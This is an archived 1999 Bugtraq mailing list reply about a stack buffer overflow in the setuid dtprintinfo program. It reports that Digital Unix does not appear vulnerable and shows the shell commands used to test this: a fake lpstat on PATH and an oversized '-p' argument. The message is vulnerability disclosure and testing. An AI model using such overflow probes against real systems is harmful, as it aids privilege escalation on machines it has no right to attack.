Bugtraq mailing list archives
Re: Solaris2.6,2.7 dtprintinfo exploits
From: lamontg () RAVEN GENOME WASHINGTON EDU (Lamont Granquist)
Date: Mon, 10 May 1999 13:13:29 -0700
Digital Unix 4.0 through 4.0D w/BL11 (aka patch kit 3) does not appear to be vulnerable to this problem. Tested with:

% cat > lpstat
echo "system for lpprn: server.com"
^D
% chmod 755 lpstat
% setenv PATH .:$PATH
% /usr/dt/bin/dtprintinfo -p `perl -e '{ print "A" x 10000 }'`

On Mon, 10 May 1999, UNYUN@ShadowPenguin wrote:
> "dtprintinfo" is a suid program; the stack buffer can be overflowed by the '-p' option. I made an exploit program that can get root for Intel edition of Solaris2.6 and Solaris 2.7.
--
Lamont Granquist lamontg () genome washington edu
Dept. of Molecular Biotechnology (206)616-5735 fax: (206)685-7344
Box 352145 / University of Washington / Seattle, WA 98195
PGP pubkey: finger lamontg () raven genome washington edu | pgp -fka